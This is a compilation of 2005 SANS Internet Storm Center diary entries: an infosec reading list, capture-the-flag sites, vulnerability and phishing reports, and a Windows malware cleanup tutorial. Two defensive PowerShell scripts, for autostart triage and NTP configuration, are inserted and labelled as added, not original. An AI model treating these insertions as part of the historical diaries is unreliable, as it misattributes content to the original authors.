Today, we asked for help in creating a summer reading list of infosec books. We asked for tomes that have majorly changed your life, or significantly influenced your thinking. PLEASE DON’T SEND ANY MORE SUGGESTIONS… WE’RE FULL NOW. ; )

Also, please note that we asked folks not to mention my own books, because my adding those to this list would be
. ; )

1) Christopher Croad has a stellar recommendation: _The_Shellcoders_Handbook_: Discovering and Exploiting Security Holes. Chris writes:

“After getting my first peek of the workings of buffer overflows in SANS SEC504, I became somewhat...well... obsessed with the topic. This book has helped to open even more doors on the topic for me, mainly because I have had to read and study other material just to comprehend the tome. A newer book (Category B), it is (at least for me) somewhat advanced, and has taken a bit of effort to get through, but it has been worth the time spent.” –- Chris Croad

2) Richard R. Carlin has a recommendation for a book I have not read, but which sounds pretty interesting: _The_Process_of_Network_Security_ by Thomas A. Wadlow. Richard writes:

“Well, this book certainly falls into the ‘A’ category because after reading it I became a believer in the ‘process’ of security over the paranoid fortress mentality I'd had previously. It is a corporate security professional must-read.” -– Richard R. Carlin

3) Chris Compton, a brilliant guy whom I respect very much, recommends _Spec_Ops:_Case_Studies_in_Special_Operations_Warfare:_Theory_and_Practice_ by William H. McRaven. Although I haven’t personally read it, I’m definitely going to add it to my own summer reading list! Chris writes:

“While not directly about information security, this book develops a theoretical model for small-unit asymmetrical operations that has direct implications for the successful planning and implementation of InfoSec objectives. The book is engagingly and concisely written, using examples of both successful and failed missions to identify key elements of success in a tactical environment. I've found that these principles directly and neatly map to the InfoSec mission, where we have small, highly-skilled teams engaging a much larger opposing force of u1+r4 1337 script kiddies and black-hats.” –- Chris Compton

4) Brian sent in a recommendation for a non-technical infosec book that I totally loved. It’s a classic in our field, and if you haven’t read it yet, I both feel sorry for and envy you. I feel sorry for you because you’ve missed it so far, but I envy you for getting to experience that exciting wonder at first reading it! The book is _The_Cuckoo’s_Egg_, by Clifford Stoll. Brian writes:

“This book, while technologically ancient, is still an entertaining read about tracking bad guys through the maze. It covers (sometimes) less than helpful telecom/ISPs, open networks (universities) and attacks through private govt networks. All still relevant in today's infosec world.” -- Brian

5) Terence E. Shelton has a recommendation that I recommend all the time as well: _The_Art_of_War_ by Sun Tzu. If you haven’t read this with an infosec frame of mind, you must do so! This summer is your chance… Make a commitment to doing it! You’ll be pleased you did so. Terence writes:

“I view [this book] as the original security book. It is not an easy read, but I enjoy pondering its applicability to today’s challenges while laying around on lazy summer vacation days. (Of course, even my own kids think I’m weird.)” -- Terence E. Shelton… Welcome to the club, Terence. : )

6) Brian Coyle, GCIA, recommends _The_Soul_of_a_New_Machine_ by Tracy Kidder. I haven’t read this one myself yet, but it sounds intriguing. Brian writes:

“This Pulitzer winner delves into the design and construction of a new computer; hardwiring circuits, writing emulation code, debugging setbacks – a perfect diversion for the InfoSec professional! I dig this out whenever I feel overworked or need a break.” -– Brian Coyle.

7) Gary Hinson recommends a book I haven’t heard of, but which sounds pretty cool. It’s called _Testing_Computer_Software_ by Cem Kaner, Jack Falk, and Hung Quoc Nguyen. According to Gary:

“This book proves beyond doubt that it *is* possible to write an informative yet enjoyable textbook. I still find it an extremely useful guide to systems testing as part of numerous information security management and IT audit assignments. Their description of the internal politics that surrounds the testing process definitely rings true.” – Gary Hinson

8) Chris Byrd recommends _Inside_the_Security_Mind:_Making_the_Tough_Decisions_ by Kevin Day. Chris says:

“This book is a must-read for new and seasoned InfoSec professionals alike. It presents a simple list of rules and ideas that encompass why even well funded and well staffed security efforts can fail. Kevin Day presents this information in a likeable, easy-to-read manner.” -- Chris Byrd

9) Danny Quist has a great great great recommendation: _Hacking:_The_Art_of_Exploitation_ by Jon Erickson. Any book that numbers its chapters in Hex is alright by me!! : ) According to Danny:

“This book contains hands-on technical information on all sorts of exploitation methods and techniques. This isn’t a defense book so much as offense. Understanding the deep, dark technical side of the vulnerabilities is an important part for defensive computing.” – Danny Quist

10) Andre’ M. Di Mino cites another one of my favorites: _Know_Your_Enemy_ by the Honeynet Project. That’s a fine tome, my friend. Andre’ (who really does have an apostrophe in the first name) says:
“When I read this book several years ago, it truly motivated me to learn as much as I could about the offensive maneuvers in the infosec war, rather than just the defensive tactics. Reading this book provided me with a great springboard into studying more about data analysis, forensics, honeypots, IDS, and firewalls….” – Andre’ M. Di Mino

11) Jerry Hailey cited one of my all time favorite non-tech books: _The_Code_Book_ by Simon Singh. Jerry himself didn’t describe the book, but I’m telling you… this one is awesome. It’s a history of cryptography and cryptanalysis and a description of how the two influence history, from ancient times to today. It’s great, and Simon Singh is a marvelous author. I loved his other book, _Fermat’s_Enigma_, and have added his new book on cosmology, _Big_Bang_ to my own Summer reading list!

12) Andreas cites a must-have reference book for the shelf: _TCP/IP_Illustrated,_Volume_1:_The_Protocols_. Andreas writes: “There’s no better guide to TCP/IP than this book… I still use it in my everyday work.” -- Andreas.

13) Lucky thirteen goes to Charles Hamby, who points out the great book _Intrusion_Signatures_and_Analysis_ by Cooper, Northcutt, Fearnow (not yesterday, not tomorrow, but fear right NOW), and Frederick. Charles writes: “I picked up this book when it first came out. It was very technical and I had to read it several times… You could say that this really was what turned me on to InfoSec.”

14) Ray Ellington mentioned a book that sounds fascinating, but could be pretty scary: _Aggressive_Network_Self_Defense_ by Neil R. Wyler. The book has caused quite a stir, based on its analysis of potential strike back options. I’ll be reading it this summer myself. Ray says:
“This book… changed my thinking in a big way. I don’t think I’ll go so far as to implementing the strike-back methods mentioned in the book, but it gave me insight into what ‘could’ be done… The hacking techniques which take place in the fictitious stories are very advanced and realistic, which make for a fun read.” – Ray Ellington

15) Robert Arrison points us to _Network_Security:_A_Beginner’s_Guide_ by Eric Maiwald, explaining that, “No matter how far you are into security, you would be surprised as to how much you forgot… This book runs the gamut on all things security…”

16) Matthew C. Huntley mentioned, _Who_Moved_My_Cheese?_ by Johnson and Blanchard. This touching allegory contains various business lessons, and according to Matthew, it is, “essential for keeping your sanity.”

Hacking Challenges: Know Any Good Ones?

Another topic very near and dear to my heart is the hacking challenges and Capture the Flag events various organizations set up on the Internet. These games involve one or more Internet accessible servers run by the challenge organizers that you are called upon to hack. Fun, mayhem, and sometimes prizes ensue. I frequently get asked about which ones are best. My favorites games like this include something for everyone: simple challenges for newbies ranging all the way up to very complex hacking designed for freakazoid geniuses (there ya go… Soon you’ll be able to Google up: freakazoid “Internet Storm Center”!).

We asked to hear from you about challenges that you’ve actually played and enjoyed… not ones that you’ve heard about or Googled up. Any of us can simply Google on “Hacking Challenges”. PLEASE DON’T SEND ANY MORE SUGGESTIONS… WE’RE FULL NOW HERE AS WELL. ; )

I) Four great challenges at the
. These wonderful challenges range from easy to quite tricky. Lots of fun!

sponsored by WindowsITPro.

III) Alex Everett writes in about this challenge, which looks fantastic:

“By far my favorite hacking challenge site is www.hackthissite.org. There are so many available hacking areas from web application attacks, SQL Injection, encryption/decryption, disassembly, etc. They also sponsor a real hack challenge entitled ‘root this box’ where secured servers such as a brickserver reside. Once you sign up you can compete in the challenges and earn points. They also have extensive forums and chat rooms. I suggest you mention this site. I think that it can be very useful to security analysts and pen testers.” –- Alex Everett

IV) Mark Pettifor brings up something cool from the cobwebs of history, which is apparently still alive today:

“Your request for ‘capture the flag’ programs reminded me of the original ‘Core Wars’ article in Scientific American that I read over 20 years ago. Apparently a modern version of Core Wars is still going on. Here's a short article describing the older Core Wars:
http://www.koth.org/info/greg_lindahl_corewars.html . If you go to the root of the web site, you'll find out more about the modern Core Wars being played.” –- Mark Pettifor

V) Brian Coyle, of “The Soul of the New Machine” recommendation fame, cites the Honeynet Project as a great source of challenges with their Scan of the Month, at www.honeynet.org. Indeedy! It’s got some great stuff, including Brian’s own work on Scan #29 at http://honeynet.org/scans/scan29/

VI) James Walden has created a Capture the Flag environment you can download, and has included target server filesystems (RH 9.0 images for User Mode Linux) and the source code of his Scorebot! All of this and more is available for free at www.eecs.utoledo.edu/~jwalden/ctf/

Thanks for reading--

--Ed Skoudis

Handler On Duty


ed (the “at” symbol… that SHIFT+2 thingy) intelguardians.com


Published: 2005-05-24

Update: Paypal Phish Conditioning; DNS Denial of Service Vulnerability; CA Vet Library Vulnerability; Combating Windows Malware Tutorial

Update: Paypal Phish Conditioning

Cory Altheide would like to thank the many readers who sent in their stories of experiencing activity similar to what was described in . He'd also like to request that anyone who has copies of the phishing emails sent soon after receiving an unsolicited password reset request send them in via the ISC .

DNS Denial of Service Vulnerability

Earlier today, the NISCC released an advisory that involves a problem with some implementations of DNS. The vulnerability occurs during a recursion process used to decompress compressed DNS messages. Using specially crafted DNS packets, it is possible to cause vulnerable DNS servers to abnormally terminate. Later this afternoon, Cisco and Secunia both issued similar advisories which show some of the Cisco products that are vulnerable to this issue. For more information on this, please see the below URLs:



Computer Associates Antivirus Vet Library Vulnerability

Alex Wheeler recently released a paper detailing a flaw in the Vet library that many of the CA products and other OEM products use to provide antivirus scan capabilities. According to CA, most of their products have had the ability to update for this automatically since May 3rd. Other companies that use this library should have patches forthcoming.

As this library is used in personal firewall suites like CA's eZ Armor and ZoneLab's ZoneAlarm, I am recommending that this issue be addressed quickly. (This issue conjures up some not-so-fond memories involving the criticality of the Blackice ICQ parser problem used by the Witty worm last year.)

Update (2330UTC) - One of our readers, Glenn Jarvis, noted that the versions of the CA EZ products are hard for most average consumers to compare against the list of vulnerable versions. In the list provided by CA, eZ Armor has many versions that are vulnerable. Using Regedit, Glenn was able to determine that his version was in fact 2.4.4, which was one of the vulnerable versions. However, if you attempt to look at the version numbers looking at the normal GUI based routes from the tray icon, you will see module numbers like

EZ Firewall Version 4.5.585.000

EZ Antivirus Version

EZ Antivirus Engine

Most consumers are not going to have the knowledge to look for the version number in the registry. And it appears that CA does not make it any easier to determine the versions of this product. In addition, Glenn noted that it appears to be possible to download separate components for either the antivirus pieces, or the firewall and miss a vulnerable library installed on the computer. I hope that CA will provide a method that their users can use to assess their risk better.

For more information on this, please see the below URLs:

Combating Windows Malware Tutorial (using WinXP Pro)

Earlier today, I received a note on one of the mailing lists I monitor asking for help trying to remove a virus from a computer on his network. His antivirus software was detecting malware on his computer and was cleaning much of this junk out of the \Windows\System32 directory, but periodically these files would get recreated. So he was ending up in this cycle of the antivirus software removing the files and something else putting them back.

As I work in an academic environment, I have seen this happen a lot with various botnet files and spyware. So I shared with this technician how I have gone about getting the system stable again. Before I proceed in my "tutorial", let me note one thing. THIS IS NOT THE WAY TO CLEAN A SYSTEM THAT HAS BEEN COMPROMISED. This is just a way to stabilize a system enough that you can back up user data prior to a complete reinstall or re-image. If you use this procedure as a way to "clean" a system, be aware that the process is not perfect and can be defeated. So in all cases, I believe it to be best to use this as a stop gap measure one can use until you can do what really needs to be done. (Think of this as placing a tourniquet on a limb before transporting the victim to a hospital. This is a field procedure to stop the "bleeding" only.)

The tools I am using and many of the Spyware and Antivirus cleaners work fine in safe mode. Some will require you to be in multi-user mode. It is also recommended that you turn off System Restore. To disable System Restore go to Start Menu -> Settings -> Control Panel -> System -> System Restore tab. You can check the box to disable the restore, and uncheck it to re-enable it at the end.

First, you need to have the right tools available. I have a CD handy which has a number of tools including major patches from MS, AntiVirus software, Spyware removal tools, personal firewall software and various other useful things. (Note to self: put a list of the field kit in a future diary.) For the moment, I am going to mostly use 4 tools in this discussion. I leave it to the reader to understand how to use their specific antivirus and spyware removal tools and when to use them in the discussion. The main 4 tools I use are Autoruns, Process Explorer and TCPView from SysInternals ( http://www.sysinternals.com/ntw2k/utilities.shtml ) and BHODemon from Definitivesolutions.com ( http://www.definitivesolutions.com/bhodemon.htm ).

Second, boot the computer to safe mode. Once you are in safe mode, run Autoruns. This utility will show you all of the various programs that are being started from the various locations in the registry and the Start Menu. Generally these and the Services are the first things that are run at boot time. So I uncheck pretty much everything with few exceptions. The main ones I never touch are

* Userinit Logon Application C:\Windows\system32\userinit.exe

* Windows Explorer C:\Windows\explorer.exe

* Any wireless, mouse, touchpad specific apps for your computer

* Antivirus and personal firewall apps

Third, run msconfig.exe (Start Menu -> Run -> msconfig.exe). Select the Services tab and then check the box to "Hide All Microsoft Services". The remaining list of services will need to be checked for any programs you do not recognize. To disable any of these, uncheck them. Many of the services will be items like antivirus, Bluetooth and wireless service apps, printer and any other special services needed by your company (VNC, backup server software, etc). Others may be other bits of malware that look similar to a real Microsoft service and would be easy to overlook. After exiting msconfig, I typically let my system reboot again to allow those changes to take effect.

Fourth, this is an excellent time to scan the computer with any AntiVirus and Spyware cleaner tools. Some of these tools do not like running in safe mode, so test this in your lab to see which tools you choose to use in the field.

Fifth, install and run BHODemon. BHODemon will show you all of the Browser Helper Objects that Internet Explorer will load at boot time. Some applications, such as Adobe Acrobat, Spybot Search and Destroy, and most IE Toolbars, will start from here. As any real executable content can be made into a BHO, one could have an almost clean system, then launch IE and suddenly have spyware or other malware attempting to be reinstalled. Uncheck any applications that BHODemon believes are malware and/or does not recognize. The benign items are probably safe enough to leave in place.

Sixth, reboot the system back into normal mode and run TCPView and Process Explorer. These 2 tools will allow you to watch the processes and the TCP/UDP connections your computer is performing. If you see much activity, then it may point you to applications that may have been missed in the first 5 steps. And chances are these are the items that need to be sent on to your favorite AV companies. If you would like to be nice and send it our direction via our <A HREF="http://isc.sans.org/contact.php">contact page</A>, we can also submit it to the AV companies with which we have contacts.

Last, it may be safe to re-enable System Restore at this time. Additionally, one should determine how the malware came into the computer. This will help you know where you need to better protect your systems in the future. Most of the botnet or other malware I have seen recently have come in through either a weak password on a local account, or through missing lsass/rpc patches. Perhaps your user caught the malware through a webpage, or IM. Perhaps the malware came through email, or a P2P application to the computer. You may be the best judge of it based on what you have found from the above steps.

Hopefully, you have been able to beat this whack-a-mole game with the malware at this point. Back up the user's data and rebuild. Make sure that all patches are applied and all local user accounts have strong passwords. And if you can make the time, educate the user in how best to protect their computer.

Note:  The above is a procedure I have used many times on my campus. At 
some point, I plan to refine this a bit more using more concrete examples
with perhaps screen captures of some of these tools. If you have
suggestions of other tools that might be useful, let us know. If there
are other places that you have seen malware get automatically started,
please let me know that too!
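As an added example that is not part of the diary or of the tools it names, the PowerShell script below automates the read-only part of steps two, three and five: it walks the Run/RunOnce keys, the auto-start services and the Browser Helper Object registrations, and flags every entry whose image file is missing or not validly signed. It assumes Windows PowerShell 5.1 or later in an elevated prompt; the registry paths are the standard ones and nothing is modified.

```powershell
# Added example (not from the ISC diary): read-only triage of the autostart
# locations the tutorial checks by hand with Autoruns, msconfig and BHODemon.
# Assumes Windows PowerShell 5.1+ running elevated. Nothing is changed.

$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
# Each subkey here is the CLSID of a Browser Helper Object; the DLL path is the
# default value of HKLM\SOFTWARE\Classes\CLSID\{clsid}\InprocServer32.
$BhoKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects'
$ProviderProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

function Get-ImagePath {
    # Extract the executable or DLL from a command line such as
    #   "C:\Program Files\Vendor\tray.exe" /silent   or   C:\WINDOWS\system32\example.exe
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cl = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cl.StartsWith('"')) {
        $end = $cl.IndexOf('"', 1)
        if ($end -gt 1) { return $cl.Substring(1, $end - 1) }
    }
    # Unquoted command line: stop at the first known binary extension.
    $m = [regex]::Match($cl, '^(.+?\.(exe|dll|cmd|bat|scr|com))(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($cl -split '\s+')[0]
}

function Test-AutostartEntry {
    # Classify one entry. Authenticode status is a triage hint, not a verdict:
    # hosts such as rundll32.exe are signed even when the DLL they load is not,
    # and catalog-signed OS files can report NotSigned on older releases.
    param([string]$Source, [string]$Name, [string]$CommandLine)
    $path = Get-ImagePath $CommandLine
    $status = 'NoImage'
    $signer = ''
    if ($path -and (Test-Path -LiteralPath $path)) {
        $sig = Get-AuthenticodeSignature -LiteralPath $path
        $status = $sig.Status.ToString()   # Valid, NotSigned, HashMismatch, NotTrusted, ...
        if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
    } elseif ($path) {
        # A cleaner removed the file but left the key behind: the "something
        # keeps putting it back" symptom shows up when the key is repopulated.
        $status = 'FileMissing'
    }
    [pscustomobject]@{
        Source     = $Source
        Name       = $Name
        Image      = $path
        Signature  = $status
        Signer     = $signer
        Suspicious = ($status -ne 'Valid')
    }
}

function Get-AutostartEntries {
    $out = @()
    foreach ($key in $RunKeys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($p.Name -in $ProviderProps) { continue }   # provider metadata, not a Run value
            $out += Test-AutostartEntry -Source $key -Name $p.Name -CommandLine ([string]$p.Value)
        }
    }
    # Auto-start services: the list msconfig shows once Microsoft services are hidden.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if ($svc.StartMode -eq 'Auto') {
            $out += Test-AutostartEntry -Source 'Service' -Name $svc.Name -CommandLine $svc.PathName
        }
    }
    if (Test-Path $BhoKey) {
        foreach ($clsid in (Get-ChildItem -Path $BhoKey).PSChildName) {
            $srv = "HKLM:\SOFTWARE\Classes\CLSID\$clsid\InprocServer32"
            $dll = if (Test-Path $srv) { (Get-ItemProperty -Path $srv).'(default)' } else { $null }
            $out += Test-AutostartEntry -Source 'BHO' -Name $clsid -CommandLine ([string]$dll)
        }
    }
    return $out
}

$entries = Get-AutostartEntries
$entries | Sort-Object Suspicious -Descending |
    Format-Table Source, Name, Image, Signature, Signer -AutoSize -Wrap
"{0} of {1} autostart entries are unsigned, invalid or point at a missing file." -f @($entries | Where-Object Suspicious).Count, $entries.Count
```

Entries marked FileMissing are the dangling keys to clear before rebooting, and anything unsigned under a Run key or BHO CLSID is what to compare against the Autoruns and BHODemon views before deciding what to uncheck.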


Scott Fendley

Handler On Duty

sfendley _AT_ isc.sans.org


Published: 2005-05-23

eBay/Paypal Phishing; Shame on that prophet; iframeDOLLARS; Cyber Extortion; OSX hardening; Incident Responder Analysis Tools

eBay/Paypal phishing via vulnerable ZeroBoard software

While the Internet Storm Center has certainly been receiving an increasing number of eBay and Paypal phishing reports, there is now supporting evidence that identifies a particular attack vector responsible for enabling at least a subset of the growing distribution of this particular phishing email variant. Both the delivery of phishing email and the website that is set up for the harvesting of user credentials are being accomplished through a php inclusion attack on web servers running vulnerable versions of the ZeroBoard bulletin board software. A <A HREF="http://www.securityfocus.com/archive/1/387076">vulnerability disclosure</A> for versions 4.1pl5 and prior of ZeroBoard software was posted to bugtraq on Jan 13 2005. The author has apparently not provided an official patch, but public workarounds are included in the bugtraq disclosure. A personal recommendation is to please check all of your Internet accessible hosts for the existence of ZeroBoard; being on the receiving end of this phish is annoying, but it's that much worse knowing that people are actively falling for this scam. Responsible hosting providers and web administrators: there are even multiple Nessus plugins (ID#s 16059, 16178 and 17199) for those that would like to automate their checks.

Shame on that prophet

As silly as I believe this next report is, it may very well lead to financial loss via the baited harvesting of paypal user credentials. The Storm Center received a report from D. Craig Rich of a website at www dot prophetyaweh dot com recommending that new paying subscribers to his site use the same user id and password that they use on paypal. <SARCASM>Oh Really? I'm into UFOs and such, so here's my $7.95(USD), and while you're at it, just help yourself to the rest of my account balance.</SARCASM> Notice we did not link to the site from this diary entry, so please do yourself a favor and don't bother visiting this site. Recommendation: Never reuse passwords between sites. You never know who has access to your data.

iframeDOLLARS dot biz partnership maliciousness

After fellow Storm Center handler Tom Liston's investigation into a report received from a SANS ISC reader named Checker today, we find ourselves examining what appears to be an awful business practice based on the wholesale attempted exploit of Internet Explorer browsers via multiple vulnerabilities for any IE client that happens to visit a 'partner' in this business venture. The exploits are hosted via hundreds of unique URLs on the website at www dot iframedollars dot biz including the <A HREF="http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-014.asp">(MS03-014) MHTML (.chm) exploit</A>, <A HREF="http://www.microsoft.com/technet/security/bulletin/MS03-011.mspx">(MS03-011) Java ByteVerify exploit</A>, <A HREF="http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx">(MS05-002) MS ANI exploit</A>, and an <A HREF="http://www.microsoft.com/technet/security/Bulletin/MS04-013.mspx">Mhtredir trojan exploiting MS04-013</A>. The successful exploit of any browser would result in the installation of at least nine additional samples of malicious code including backdoors, trojans, and spy/adware. So how much is your compromised workstation worth to website administrators that participate in this revenue generation scheme? A whopping $0.61(USD).
LATE DIARY ADDITION: Michael Ligh wrote in notifying us of his involvement in investigating a compromise that involved an iframedollars partner. His excellent writeup is hosted on <A HREF="http://www.mnin.org/write/2005_trimode.html">Michael's personal website</A>.
The question is: How much satisfaction can one organization achieve by null-routing all traffic to this host at

Answer: You tell us.

Cyber Extortion by client browser exploit

If the iframeDOLLARS business isn't enough, the Storm Center received an <A HREF="http://www.websensesecuritylabs.com/alerts/alert.php?AlertID=194">alert</A> from Dan Hubbard at WebSense Security Labs of a Cyber Extortion plot involving the encoding of workstation user data after the Internet user presumably had fallen prey to a <A HREF="http://www.microsoft.com/technet/security/Bulletin/MS04-023.mspx">Microsoft Internet Explorer HTTP Help browser vulnerability (MS04-023)</A>. After workstation data is encoded, the user is presented with an extortion offer enabling the user to receive a tool that would decode captive data after delivering a payment of $200.00(USD) to the extorter via an online payment service. Windows users, don't you think that is a good enough reason to check whether you are patched for this and other recent vulnerabilities? Why not kick off a Windows Update after reading the rest of this diary entry?

Additional OSX hardening guide

Supporting the May 22nd diary which included a link to the NSA OSX hardening guide, John Banghart with the Center for Internet Security wrote in to identify the availability of the CIS OSX hardening guide available for download from <A HREF="http://www.cisecurity.org">http://www.cisecurity.org</A>.

Incident Responder Malware Capture, Control and Analysis tools

Hey you! Incident Responder! Yeah, you! Here are a few tools in the toolbox that haven't been mentioned here recently and that I've been having a great amount of success and fun with. For capturing malware I use <A HREF="http://www.mwcollect.org">mwcollect</A>. Mwcollect has been developed within the German Honeynet Project and is the tool referred to in the Honeynet Project's recent Bots paper. Once I've collected samples and determined that something is interesting enough to examine, quick analysis gains are to be had without heavy reverse engineering by performing runtime analysis, which I do in my own Malware Motel (malicious code gets in, but it can't get out). That is just a few slight modifications to the Honeynet Project's <A HREF="http://www.honeynet.org/tools/cdrom">Honeywall</A>, which enables data and network controls and provides you with as limited a live network environment as you want for analyzing malicious code. The Honeynet Project released the updated next generation of the Honeywall on May 17th 2005.


Published: 2005-05-22

Mac Security; Anonymity with Tor; Web Vandals v. Phishers; Paypal Phish Conditioning

OS X Update, Mac Security

Apple's was released earlier last week. Among other things, this update fixes the oft-reported security issue surrounding the auto-install of widgets. I am of the opinion that the bulk of this vulnerability lies with the default configuration of Safari, which auto-runs "safe" file types once they are downloaded.

If you are running a Mac, go turn this off. Right now. (Safari -> Preferences -> General) I'll wait.

While I'm beating the drum of Mac security, let me point you to some other good sources of Mac-sec information. First and foremost, we've got the extremely detailed
for OS X. After following this guide, your Mac should be reasonably secured against threats internal and external, foreign and domestic. The NSA guide is geared towards Panther, but most of the document should still apply to Tiger.

is covered in the NSA guide, but I think it deserves special mention, since in Tiger it is now actually useful, thanks to Tiger fixing the . Prior to this, an adversary with physical access to your Mac had a decent possibility of recovering your login password (which is used to unlock the encrypted FileVault volume) from swap. Since on-disk encryption is designed to protect sensitive data from adversaries with physical access, this meant that FileVault was more of a "disk access governor" than a security measure. Thankfully, this is no longer the case, so you can rest easy the next time you lose your $3000 PowerBook. While you're out 3K, at least your data is safe.

On non-server versions of OS X, the GUI firewall configuration utility leaves quite a bit to be desired. The GUI is really just a simplistic frontend to
. There is a pretty good Mac-oriented overview of ipfw .

I'm not certain if this issue has been or can be fixed by Tiger as I'm on my Panther machine right now, but there is a long-standing problem in the OS X world related to
. These holes are usually opened up by third party application installers, and allow simple malcode like the to elevate privilege on the system. Periodically checking your system for directories with vulnerable permissions is recommended.

For Mac security news and links, one of my favorite sites is
. It's the antithesis of an Apple site - no flash, no glitz, just info and links - which is why I think I enjoy it so much. There are a couple of books on the subject as well, if you prefer dead-tree media: Mac OS X Security and Maximum Mac OS Security. Mac OS X Security is a good read, and covers a lot of what I've talked about here and then some. I can't comment on the latter as I haven't read it, but if the title is any indication, it should be phenomenal. ;)

Tor Anonymous Network Reaches 100 Nodes

I generally try to avoid "announcements" in diaries, but bringing attention to
is a worthwhile end. Tor is an onion routing network supported by the EFF and managed by the . If you're not familiar with the concept of onion routing, it's explained very well .

To summarize, Tor is a fairly speedy anonymity network which you can tunnel arbitrary TCP connections through. While the bulk of Tor users are undoubtedly using it for anonymous web browsing, nearly any application that can use a SOCKS or HTTP proxy can be run through Tor, as evidenced by the
. I've been tunneling IRC and AIM through it recently and have had no issues. Web surfing gets a little strange when Google keeps switching languages based on the location of your last hop out of the Tor network, though. If you're concerned about your privacy online, give it a try.

Web Vigilantes v. Phishermen

According to a recent
web-site defacers have taken up virtual arms against phishing sites. As a resident of fabulous Las Vegas, Nevada, I can't help but think of listening to long-time Vegas residents wax nostalgic about how much nicer, safer, and cleaner the town was when the Mob ran the place.

Paypal Phishing Conditioning?

ISC reader TJ O'Grady reported receiving a legitimate password reset verification from Paypal. As he had not requested any reset, he contacted Paypal via telephone and was told that they were having technical difficulties and that he shouldn't worry about the email.

A few hours later, he received a Paypal phishing email suggesting that he log into his account as there had been unusual activity.

Have any other ISC readers experienced a similar combination of emails? Is TJ's circumstance simply a coincidence or have Paypal phishers begun a social engineering process of conditioning their marks into complying with later requests?

John Says Thanks!

Handler John Bambenek would like to thank everyone who submitted feedback in response to his
and apologizes for not responding to each of you individually.

That wraps up today's diary, kids! Until next time, I leave you with the following:

"It is difficult for a fool's habits to change to selflessness. In confronting a matter, however, if at first you leave it alone, fix the four vows in your heart, exclude self-interest, and make an effort, you will not go far from your mark."


Cory Altheide


Published: 2005-05-21

Microsoft time (cont.); Firefox exploits; PAWS exploit; port 445

Late Edition

Microsoft time (continued)

Just a quick update from . According to the Microsoft help system the protocol used is NTP and as such most likely your ISP already has a well connected NTP server for you. Please consider looking up how it is named (often it is ntp.<yourISP>.<tld>) and synchronize from that one. The decrease in network delay and the decrease in possibility for asymmetric routing, and all the consequences for the stability of the time on your machine(s), will be to your advantage, even after time.windows.com returns to service.

The NIST also maintains a
of which time.nist.gov is only one, you can use the others as well.

Considering how NTP normally works, you might also consider installing a more complete NTP implementation so that you can configure multiple servers for the client to choose from and not become dependent on just one server.

We received multiple suggestions to use pool.ntp.org's ntp servers (which can be set to your region/country). Bob Grabowsky suggested this URL:
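As an added example, not from the diary, the PowerShell script below turns the advice above (several servers, your ISP's first, pool.ntp.org as a fallback) into a check on the Windows Time service configuration plus the w32tm command that applies the new list. It assumes Windows PowerShell 5.1 or later in an elevated prompt; 'ntp.example-isp.net' is a placeholder for your ISP's server and the pool.ntp.org names are the public zone names.

```powershell
# Added example (not from the ISC diary): audit the Windows Time service peer
# list for the single-server dependency described above and replace it with
# several servers. Assumes Windows PowerShell 5.1+ in an elevated prompt.
# 'ntp.example-isp.net' is a placeholder for your ISP's server.

$W32TimeParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\W32Time\Parameters'

function ConvertFrom-NtpServerValue {
    # NtpServer is a space-separated list of "host,0xFLAGS" entries, e.g.
    # "time.windows.com,0x9". Flag 0x1 = poll at SpecialPollInterval,
    # 0x8 = client mode only; 0x9 combines both and is the usual setting.
    param([string]$Value)
    $peers = @()
    foreach ($entry in ($Value -split '\s+' | Where-Object { $_ })) {
        $peerHost, $flagText = $entry -split ',', 2
        $flags = if ($flagText) { [int]$flagText } else { 0 }
        $peers += [pscustomobject]@{ Host = $peerHost; Flags = $flags }
    }
    return $peers
}

function Test-NtpPeerList {
    # Flags the failure mode from the diary: a lone peer, and that peer is
    # Microsoft's public server, so its outage leaves the clock free-running.
    param([string]$Value)
    $peers = @(ConvertFrom-NtpServerValue $Value)
    [pscustomobject]@{
        Peers       = ($peers | ForEach-Object { $_.Host }) -join ' '
        PeerCount   = $peers.Count
        SinglePoint = ($peers.Count -lt 2)
        DefaultOnly = ($peers.Count -eq 1 -and $peers[0].Host -ieq 'time.windows.com')
    }
}

function New-NtpPeerList {
    # ISP server first (shortest network path), then regional pool servers;
    # each gets the 0x9 flags so the service polls them as a plain client.
    param([string[]]$Hosts = @('ntp.example-isp.net', '0.pool.ntp.org', '1.pool.ntp.org', '2.pool.ntp.org'))
    return (($Hosts | ForEach-Object { "$_,0x9" }) -join ' ')
}

$current = (Get-ItemProperty -Path $W32TimeParams -Name NtpServer).NtpServer
$finding = Test-NtpPeerList $current
$finding | Format-List

if ($finding.SinglePoint) {
    $peerList = New-NtpPeerList
    # w32tm is the supported way to change the list; it rewrites NtpServer, and
    # /syncfromflags:manual tells the service to use it rather than a domain source.
    w32tm /config /manualpeerlist:"$peerList" /syncfromflags:manual /update
    w32tm /resync
}
```

On a domain-joined machine leave the domain hierarchy in place and apply the list only on the PDC emulator, which is the host that actually needs external time sources.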

Firefox 1.0.3 exploits released

K-Otik/FrSIRT has released 3 exploits against Firefox 1.0.3; If you haven't upgraded to 1.0.4, this is yet another good reason to do so without delay.

in your preferred flavor. For a description of the problems, Mozilla has the following URLs:


PAWS Exploit released

The same folks from France released also an attacking TCP connections under certain conditions. Those of us having critical infrastructure relying on the persistence of TCP connections should check with their supplier.

References: CAN-2005-0356

rBot.NT - port 445

iDEFENSE has been reporting on a spike in port 445 activity linked to rBot.NT.
The data for at Dshield currently cannot correlate with that analysis. The peak you see around the 13th is not related nor to be taken seriously in this respect.
